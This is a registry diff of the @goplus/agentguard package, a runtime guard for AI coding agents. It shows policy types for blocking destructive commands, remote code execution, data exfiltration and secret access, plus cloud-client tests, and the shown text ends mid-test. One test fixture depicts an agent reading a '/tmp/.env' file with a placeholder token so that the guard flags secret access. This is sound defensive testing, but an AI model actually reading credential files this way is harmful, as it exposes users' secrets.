@goplus/agentguard 1.1.1 → 1.1.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (107) hide show
  1. package/README.md +41 -2
  2. package/dist/cli.d.ts +3 -0
  3. package/dist/cli.d.ts.map +1 -0
  4. package/dist/cli.js +335 -0
  5. package/dist/cli.js.map +1 -0
  6. package/dist/cloud/client.d.ts +41 -0
  7. package/dist/cloud/client.d.ts.map +1 -0
  8. package/dist/cloud/client.js +145 -0
  9. package/dist/cloud/client.js.map +1 -0
  10. package/dist/config.d.ts +31 -0
  11. package/dist/config.d.ts.map +1 -0
  12. package/dist/config.js +133 -0
  13. package/dist/config.js.map +1 -0
  14. package/dist/feed/selfcheck.d.ts +36 -0
  15. package/dist/feed/selfcheck.d.ts.map +1 -0
  16. package/dist/feed/selfcheck.js +198 -0
  17. package/dist/feed/selfcheck.js.map +1 -0
  18. package/dist/feed/state.d.ts +14 -0
  19. package/dist/feed/state.d.ts.map +1 -0
  20. package/dist/feed/state.js +57 -0
  21. package/dist/feed/state.js.map +1 -0
  22. package/dist/feed/types.d.ts +102 -0
  23. package/dist/feed/types.d.ts.map +1 -0
  24. package/dist/feed/types.js +15 -0
  25. package/dist/feed/types.js.map +1 -0
  26. package/dist/index.d.ts +7 -0
  27. package/dist/index.d.ts.map +1 -1
  28. package/dist/index.js +25 -1
  29. package/dist/index.js.map +1 -1
  30. package/dist/installers.d.ts +10 -0
  31. package/dist/installers.d.ts.map +1 -0
  32. package/dist/installers.js +137 -0
  33. package/dist/installers.js.map +1 -0
  34. package/dist/mcp-server.js +3 -2
  35. package/dist/mcp-server.js.map +1 -1
  36. package/dist/postinstall.d.ts +3 -0
  37. package/dist/postinstall.d.ts.map +1 -0
  38. package/dist/postinstall.js +13 -0
  39. package/dist/postinstall.js.map +1 -0
  40. package/dist/runtime/audit.d.ts +10 -0
  41. package/dist/runtime/audit.d.ts.map +1 -0
  42. package/dist/runtime/audit.js +94 -0
  43. package/dist/runtime/audit.js.map +1 -0
  44. package/dist/runtime/evaluator.d.ts +3 -0
  45. package/dist/runtime/evaluator.d.ts.map +1 -0
  46. package/dist/runtime/evaluator.js +197 -0
  47. package/dist/runtime/evaluator.js.map +1 -0
  48. package/dist/runtime/policy.d.ts +12 -0
  49. package/dist/runtime/policy.d.ts.map +1 -0
  50. package/dist/runtime/policy.js +81 -0
  51. package/dist/runtime/policy.js.map +1 -0
  52. package/dist/runtime/protect.d.ts +22 -0
  53. package/dist/runtime/protect.d.ts.map +1 -0
  54. package/dist/runtime/protect.js +172 -0
  55. package/dist/runtime/protect.js.map +1 -0
  56. package/dist/runtime/redaction.d.ts +6 -0
  57. package/dist/runtime/redaction.d.ts.map +1 -0
  58. package/dist/runtime/redaction.js +103 -0
  59. package/dist/runtime/redaction.js.map +1 -0
  60. package/dist/runtime/types.d.ts +62 -0
  61. package/dist/runtime/types.d.ts.map +1 -0
  62. package/dist/runtime/types.js +3 -0
  63. package/dist/runtime/types.js.map +1 -0
  64. package/dist/tests/cloud-live.test.d.ts +2 -0
  65. package/dist/tests/cloud-live.test.d.ts.map +1 -0
  66. package/dist/tests/cloud-live.test.js +68 -0
  67. package/dist/tests/cloud-live.test.js.map +1 -0
  68. package/dist/tests/feed-cloud.test.d.ts +2 -0
  69. package/dist/tests/feed-cloud.test.d.ts.map +1 -0
  70. package/dist/tests/feed-cloud.test.js +93 -0
  71. package/dist/tests/feed-cloud.test.js.map +1 -0
  72. package/dist/tests/feed-selfcheck.test.d.ts +2 -0
  73. package/dist/tests/feed-selfcheck.test.d.ts.map +1 -0
  74. package/dist/tests/feed-selfcheck.test.js +118 -0
  75. package/dist/tests/feed-selfcheck.test.js.map +1 -0
  76. package/dist/tests/installer.test.d.ts +2 -0
  77. package/dist/tests/installer.test.d.ts.map +1 -0
  78. package/dist/tests/installer.test.js +32 -0
  79. package/dist/tests/installer.test.js.map +1 -0
  80. package/dist/tests/runtime-cloud.test.d.ts +2 -0
  81. package/dist/tests/runtime-cloud.test.d.ts.map +1 -0
  82. package/dist/tests/runtime-cloud.test.js +206 -0
  83. package/dist/tests/runtime-cloud.test.js.map +1 -0
  84. package/dist/version.d.ts +2 -0
  85. package/dist/version.d.ts.map +1 -0
  86. package/dist/version.js +7 -0
  87. package/dist/version.js.map +1 -0
  88. package/docs/SECURITY-POLICY.md +558 -0
  89. package/docs/architecture.md +54 -0
  90. package/docs/claude-code.md +41 -0
  91. package/docs/cloud-connect.md +73 -0
  92. package/docs/cloud-native-api.md +526 -0
  93. package/docs/codex.md +38 -0
  94. package/docs/goplus-api.md +38 -0
  95. package/docs/mcp-server.md +39 -0
  96. package/docs/openclaw.md +41 -0
  97. package/docs/privacy-boundary.md +37 -0
  98. package/docs/sdk.md +83 -0
  99. package/docs/trust-cli.md +58 -0
  100. package/examples/openclaw-docker/Dockerfile +10 -0
  101. package/examples/openclaw-docker/README.md +16 -0
  102. package/examples/openclaw-docker/docker-compose.yml +8 -0
  103. package/examples/openclaw-docker/plugin.ts +8 -0
  104. package/package.json +7 -2
  105. package/skills/agentguard/SKILL.md +19 -0
  106. package/skills/agentguard/package.json +2 -1
  107. package/skills/agentguard/scripts/checkup-report.js +2 -15
@@ -0,0 +1 @@
1
+ {"version":3,"file":"redaction.js","sourceRoot":"","sources":["../../src/runtime/redaction.ts"],"names":[],"mappings":"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"}
@@ -0,0 +1,62 @@
1
+ export type CloudPolicyDecision = 'allow' | 'warn' | 'require_approval' | 'block';
2
+ export type RuntimeRiskLevel = 'safe' | 'low' | 'medium' | 'high' | 'critical';
3
+ export type RuntimeSeverity = 'info' | 'low' | 'medium' | 'high' | 'critical';
4
+ export type RuntimeActionType = 'shell' | 'file_read' | 'file_write' | 'network' | 'mcp_tool' | 'browser' | 'skill_install' | 'deploy' | 'other';
5
+ export type RuntimeAgentHost = 'claude-code' | 'codex' | 'openclaw' | 'cursor' | 'gemini' | 'copilot' | 'other';
6
+ export interface PolicyReason {
7
+ code: string;
8
+ severity: RuntimeSeverity;
9
+ title: string;
10
+ description: string;
11
+ evidence?: string;
12
+ remediation?: string;
13
+ }
14
+ export interface EffectiveRuntimePolicy {
15
+ policyVersion: string;
16
+ mode: 'observe' | 'balanced' | 'strict';
17
+ decisions: {
18
+ destructiveCommand: CloudPolicyDecision;
19
+ remoteCodeExecution: CloudPolicyDecision;
20
+ dataExfiltration: CloudPolicyDecision;
21
+ secretAccess: CloudPolicyDecision;
22
+ deployAction: CloudPolicyDecision;
23
+ };
24
+ protectedPaths: string[];
25
+ blockedCommandPatterns: string[];
26
+ allowedCommandPatterns: string[];
27
+ approvalActionTypes: RuntimeActionType[];
28
+ network: {
29
+ defaultOutbound: CloudPolicyDecision;
30
+ blockedDomains: string[];
31
+ approvalDomains: string[];
32
+ };
33
+ updatedAt: string;
34
+ }
35
+ export interface RuntimeAction {
36
+ sessionId: string;
37
+ agentHost: RuntimeAgentHost;
38
+ actionType: RuntimeActionType;
39
+ toolName: string;
40
+ input: string;
41
+ cwd?: string;
42
+ sourceSkill?: string;
43
+ metadata?: Record<string, unknown>;
44
+ }
45
+ export interface RuntimeDecision {
46
+ actionId: string;
47
+ decision: CloudPolicyDecision;
48
+ riskScore: number;
49
+ riskLevel: RuntimeRiskLevel;
50
+ reasons: PolicyReason[];
51
+ policyVersion: string;
52
+ expiresAt?: string;
53
+ }
54
+ export interface RuntimeAuditEvent extends RuntimeAction {
55
+ actionId: string;
56
+ decision: CloudPolicyDecision;
57
+ riskScore: number;
58
+ riskLevel: RuntimeRiskLevel;
59
+ reasons: PolicyReason[];
60
+ policyVersion: string;
61
+ }
62
+ //# sourceMappingURL=types.d.ts.map
@@ -0,0 +1 @@
1
+ {"version":3,"file":"types.d.ts","sourceRoot":"","sources":["../../src/runtime/types.ts"],"names":[],"mappings":"AAAA,MAAM,MAAM,mBAAmB,GAAG,OAAO,GAAG,MAAM,GAAG,kBAAkB,GAAG,OAAO,CAAC;AAClF,MAAM,MAAM,gBAAgB,GAAG,MAAM,GAAG,KAAK,GAAG,QAAQ,GAAG,MAAM,GAAG,UAAU,CAAC;AAC/E,MAAM,MAAM,eAAe,GAAG,MAAM,GAAG,KAAK,GAAG,QAAQ,GAAG,MAAM,GAAG,UAAU,CAAC;AAE9E,MAAM,MAAM,iBAAiB,GACzB,OAAO,GACP,WAAW,GACX,YAAY,GACZ,SAAS,GACT,UAAU,GACV,SAAS,GACT,eAAe,GACf,QAAQ,GACR,OAAO,CAAC;AAEZ,MAAM,MAAM,gBAAgB,GACxB,aAAa,GACb,OAAO,GACP,UAAU,GACV,QAAQ,GACR,QAAQ,GACR,SAAS,GACT,OAAO,CAAC;AAEZ,MAAM,WAAW,YAAY;IAC3B,IAAI,EAAE,MAAM,CAAC;IACb,QAAQ,EAAE,eAAe,CAAC;IAC1B,KAAK,EAAE,MAAM,CAAC;IACd,WAAW,EAAE,MAAM,CAAC;IACpB,QAAQ,CAAC,EAAE,MAAM,CAAC;IAClB,WAAW,CAAC,EAAE,MAAM,CAAC;CACtB;AAED,MAAM,WAAW,sBAAsB;IACrC,aAAa,EAAE,MAAM,CAAC;IACtB,IAAI,EAAE,SAAS,GAAG,UAAU,GAAG,QAAQ,CAAC;IACxC,SAAS,EAAE;QACT,kBAAkB,EAAE,mBAAmB,CAAC;QACxC,mBAAmB,EAAE,mBAAmB,CAAC;QACzC,gBAAgB,EAAE,mBAAmB,CAAC;QACtC,YAAY,EAAE,mBAAmB,CAAC;QAClC,YAAY,EAAE,mBAAmB,CAAC;KACnC,CAAC;IACF,cAAc,EAAE,MAAM,EAAE,CAAC;IACzB,sBAAsB,EAAE,MAAM,EAAE,CAAC;IACjC,sBAAsB,EAAE,MAAM,EAAE,CAAC;IACjC,mBAAmB,EAAE,iBAAiB,EAAE,CAAC;IACzC,OAAO,EAAE;QACP,eAAe,EAAE,mBAAmB,CAAC;QACrC,cAAc,EAAE,MAAM,EAAE,CAAC;QACzB,eAAe,EAAE,MAAM,EAAE,CAAC;KAC3B,CAAC;IACF,SAAS,EAAE,MAAM,CAAC;CACnB;AAED,MAAM,WAAW,aAAa;IAC5B,SAAS,EAAE,MAAM,CAAC;IAClB,SAAS,EAAE,gBAAgB,CAAC;IAC5B,UAAU,EAAE,iBAAiB,CAAC;IAC9B,QAAQ,EAAE,MAAM,CAAC;IACjB,KAAK,EAAE,MAAM,CAAC;IACd,GAAG,CAAC,EAAE,MAAM,CAAC;IACb,WAAW,CAAC,EAAE,MAAM,CAAC;IACrB,QAAQ,CAAC,EAAE,MAAM,CAAC,MAAM,EAAE,OAAO,CAAC,CAAC;CACpC;AAED,MAAM,WAAW,eAAe;IAC9B,QAAQ,EAAE,MAAM,CAAC;IACjB,QAAQ,EAAE,mBAAmB,CAAC;IAC9B,SAAS,EAAE,MAAM,CAAC;IAClB,SAAS,EAAE,gBAAgB,CAAC;IAC5B,OAAO,EAAE,YAAY,EAAE,CAAC;IACxB,aAAa,EAAE,MAAM,CAAC;IACtB,SAAS,CAAC,EAAE,MAAM,CAAC;CACpB;AAED,MAAM,WAAW,iBAAkB,SAAQ,aAAa;IACtD,QAAQ,EAAE,MAAM,CAAC;IACjB,QAAQ,EAAE,mBAAmB,CAAC;IAC9B,SAAS,EAAE,MAAM,CAAC;IAClB,SAAS,EAAE,gBAAgB,CAAC;IAC5B,OAAO,EAAE,YAAY,EAAE,CAAC;IACxB,aAAa,EAAE,MAAM,CAAC;CACvB"}
@@ -0,0 +1,3 @@
1
+ "use strict";
2
+ Object.defineProperty(exports, "__esModule", { value: true });
3
+ //# sourceMappingURL=types.js.map
@@ -0,0 +1 @@
1
+ {"version":3,"file":"types.js","sourceRoot":"","sources":["../../src/runtime/types.ts"],"names":[],"mappings":""}
@@ -0,0 +1,2 @@
1
+ export {};
2
+ //# sourceMappingURL=cloud-live.test.d.ts.map
@@ -0,0 +1 @@
1
+ {"version":3,"file":"cloud-live.test.d.ts","sourceRoot":"","sources":["../../src/tests/cloud-live.test.ts"],"names":[],"mappings":""}
@@ -0,0 +1,68 @@
1
+ "use strict";
2
+ var __importDefault = (this && this.__importDefault) || function (mod) {
3
+ return (mod && mod.__esModule) ? mod : { "default": mod };
4
+ };
5
+ Object.defineProperty(exports, "__esModule", { value: true });
6
+ const node_test_1 = require("node:test");
7
+ const strict_1 = __importDefault(require("node:assert/strict"));
8
+ const client_js_1 = require("../cloud/client.js");
9
+ const apiKey = process.env.AGENTGUARD_API_KEY;
10
+ const cloudUrl = process.env.AGENTGUARD_CLOUD_URL || 'https://agentguard.gopluslabs.io';
11
+ const runLive = Boolean(apiKey);
12
+ (0, node_test_1.describe)('Cloud live integration', { skip: !runLive }, () => {
13
+ const config = {
14
+ version: 1,
15
+ level: 'balanced',
16
+ cloudUrl,
17
+ apiKey,
18
+ policyCachePath: '',
19
+ auditPath: '',
20
+ eventSpoolPath: '',
21
+ };
22
+ const client = new client_js_1.AgentGuardCloudClient(config);
23
+ (0, node_test_1.it)('fetches effective policy from the configured Cloud', async () => {
24
+ const policy = await client.fetchEffectivePolicy();
25
+ strict_1.default.ok(policy.policyVersion);
26
+ strict_1.default.ok(policy.decisions);
27
+ });
28
+ (0, node_test_1.it)('ingests a redacted runtime audit event', async () => {
29
+ const event = sampleEvent('warn');
30
+ event.input = 'echo safe --api_key=live-secret-that-must-be-redacted';
31
+ await client.ingestEvents([event]);
32
+ });
33
+ (0, node_test_1.it)('creates a Cloud approval request', async () => {
34
+ const event = sampleEvent('require_approval');
35
+ event.input = '/tmp/.env?token=live-secret-that-must-be-redacted';
36
+ event.riskScore = 55;
37
+ event.riskLevel = 'high';
38
+ event.reasons = [
39
+ {
40
+ code: 'SECRET_ACCESS',
41
+ severity: 'high',
42
+ title: 'Live test protected path access',
43
+ description: 'Live integration test verifies approval creation.',
44
+ evidence: '/tmp/.env?token=live-secret-that-must-be-redacted',
45
+ },
46
+ ];
47
+ const approvalId = await client.createApproval(event);
48
+ strict_1.default.ok(approvalId);
49
+ });
50
+ });
51
+ function sampleEvent(decision) {
52
+ const suffix = `${Date.now()}_${Math.random().toString(36).slice(2)}`;
53
+ return {
54
+ actionId: `act_live_${suffix}`,
55
+ sessionId: `sess_live_${suffix}`,
56
+ agentHost: 'codex',
57
+ actionType: 'shell',
58
+ toolName: 'Bash',
59
+ input: 'echo safe',
60
+ decision,
61
+ riskScore: decision === 'allow' ? 0 : 20,
62
+ riskLevel: decision === 'allow' ? 'safe' : 'medium',
63
+ reasons: [],
64
+ policyVersion: 'live-test',
65
+ metadata: { test: 'cloud-live' },
66
+ };
67
+ }
68
+ //# sourceMappingURL=cloud-live.test.js.map
@@ -0,0 +1 @@
1
+ {"version":3,"file":"cloud-live.test.js","sourceRoot":"","sources":["../../src/tests/cloud-live.test.ts"],"names":[],"mappings":"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"}
@@ -0,0 +1,2 @@
1
+ export {};
2
+ //# sourceMappingURL=feed-cloud.test.d.ts.map
@@ -0,0 +1 @@
1
+ {"version":3,"file":"feed-cloud.test.d.ts","sourceRoot":"","sources":["../../src/tests/feed-cloud.test.ts"],"names":[],"mappings":""}
@@ -0,0 +1,93 @@
1
+ "use strict";
2
+ var __importDefault = (this && this.__importDefault) || function (mod) {
3
+ return (mod && mod.__esModule) ? mod : { "default": mod };
4
+ };
5
+ Object.defineProperty(exports, "__esModule", { value: true });
6
+ const node_test_1 = require("node:test");
7
+ const strict_1 = __importDefault(require("node:assert/strict"));
8
+ const node_http_1 = require("node:http");
9
+ const client_js_1 = require("../cloud/client.js");
10
+ function startServer(handler) {
11
+ return new Promise((resolve) => {
12
+ const server = (0, node_http_1.createServer)(handler);
13
+ server.listen(0, '127.0.0.1', () => {
14
+ const { port } = server.address();
15
+ resolve({ url: `http://127.0.0.1:${port}`, server });
16
+ });
17
+ });
18
+ }
19
+ (0, node_test_1.describe)('cloud client — feed methods', () => {
20
+ let baseUrl;
21
+ let server;
22
+ let lastRequest = null;
23
+ let nextResponse = { status: 200, body: {} };
24
+ (0, node_test_1.before)(async () => {
25
+ const started = await startServer(async (req, res) => {
26
+ const chunks = [];
27
+ for await (const chunk of req)
28
+ chunks.push(chunk);
29
+ const raw = Buffer.concat(chunks).toString('utf8');
30
+ lastRequest = { url: req.url, method: req.method, body: raw ? JSON.parse(raw) : undefined };
31
+ res.statusCode = nextResponse.status;
32
+ res.setHeader('content-type', 'application/json');
33
+ res.end(JSON.stringify(nextResponse.body));
34
+ });
35
+ baseUrl = started.url;
36
+ server = started.server;
37
+ });
38
+ (0, node_test_1.after)(() => {
39
+ server.close();
40
+ });
41
+ (0, node_test_1.it)('pullAdvisories returns advisories on 200', async () => {
42
+ nextResponse = {
43
+ status: 200,
44
+ body: {
45
+ success: true,
46
+ data: {
47
+ advisories: [
48
+ {
49
+ id: 'AGS-2026-1',
50
+ ecosystem: 'skill',
51
+ severity: 'high',
52
+ summary: 's',
53
+ detailsMd: '',
54
+ affected: [{ namePattern: 'foo' }],
55
+ publishedAt: '2026-05-13T00:00:00Z',
56
+ },
57
+ ],
58
+ },
59
+ },
60
+ };
61
+ const client = new client_js_1.AgentGuardCloudClient({ cloudUrl: baseUrl, apiKey: 'ag_live_x' });
62
+ const result = await client.pullAdvisories('2026-05-12T00:00:00Z');
63
+ strict_1.default.equal(result?.length, 1);
64
+ strict_1.default.equal(result?.[0].id, 'AGS-2026-1');
65
+ strict_1.default.match(lastRequest.url, /\/api\/v1\/feed\/advisories\?since=/);
66
+ });
67
+ (0, node_test_1.it)('pullAdvisories returns null on 404 (older Cloud)', async () => {
68
+ nextResponse = { status: 404, body: { success: false, error: { message: 'Not found' } } };
69
+ const client = new client_js_1.AgentGuardCloudClient({ cloudUrl: baseUrl, apiKey: 'ag_live_x' });
70
+ const result = await client.pullAdvisories();
71
+ strict_1.default.equal(result, null);
72
+ });
73
+ (0, node_test_1.it)('pullAdvisories throws on other errors', async () => {
74
+ nextResponse = { status: 500, body: { success: false, error: { message: 'boom' } } };
75
+ const client = new client_js_1.AgentGuardCloudClient({ cloudUrl: baseUrl, apiKey: 'ag_live_x' });
76
+ await strict_1.default.rejects(() => client.pullAdvisories(), (err) => err instanceof client_js_1.CloudRequestError && err.status === 500);
77
+ });
78
+ (0, node_test_1.it)('reportSelfCheck POSTs the advisoryId + matches', async () => {
79
+ nextResponse = { status: 200, body: { success: true, data: {} } };
80
+ const client = new client_js_1.AgentGuardCloudClient({ cloudUrl: baseUrl, apiKey: 'ag_live_x' });
81
+ await client.reportSelfCheck('AGS-2026-1', [{ path: '/tmp/skills/bad', matchedBy: 'namePattern' }], { elapsedMs: 12 });
82
+ strict_1.default.equal(lastRequest.method, 'POST');
83
